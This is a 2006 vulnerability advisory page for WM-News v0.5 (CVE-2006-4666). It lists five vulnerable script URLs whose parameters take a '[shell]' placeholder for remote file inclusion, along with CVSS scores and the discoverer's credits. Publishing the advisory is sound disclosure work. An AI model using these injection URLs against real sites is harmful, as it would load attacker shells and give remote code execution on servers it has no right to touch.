Bug: WM-News v0.5 - Remote File Include Vulnerabilities ( Ascii Version )

Search:
WLB2

WM-News v0.5 - Remote File Include Vulnerabilities

Published
Credit
Risk
2006.09.12
erne
High
CWE
CVE
Local
Remote
CWE-94
CVE-2006-4666
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# WM-News v0.5 - Remote File Include Vulnerabilities

# site : http://www.comscripts.com/jump.php?action=script&id=203

# Script : WM-News v0.5

# Credits : ERNE

# Contact : erne (at) ernealizm (dot) com [email concealed] and irc.gigachat.net #kurdhack

# Thanks : BLaCKWHITE, B0tan, FearLesS, B3g0k, Liz0zim, EntRiKa, Dj_Remix, Di_Lejyoner

# Vulnerable :

http://www.site.com/[path]/content/article.php?ide=[shell]

http://www.site.com/[path]/content/delete.php?pwfile=[shell]

http://www.site.com/[path]/content/modify.php?pwfile=[shell]

http://www.site.com/[path]/content/admin.php?pwfile=[shell]

http://www.site.com/[path]/content/modify_go.php?pwfile=[shell]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version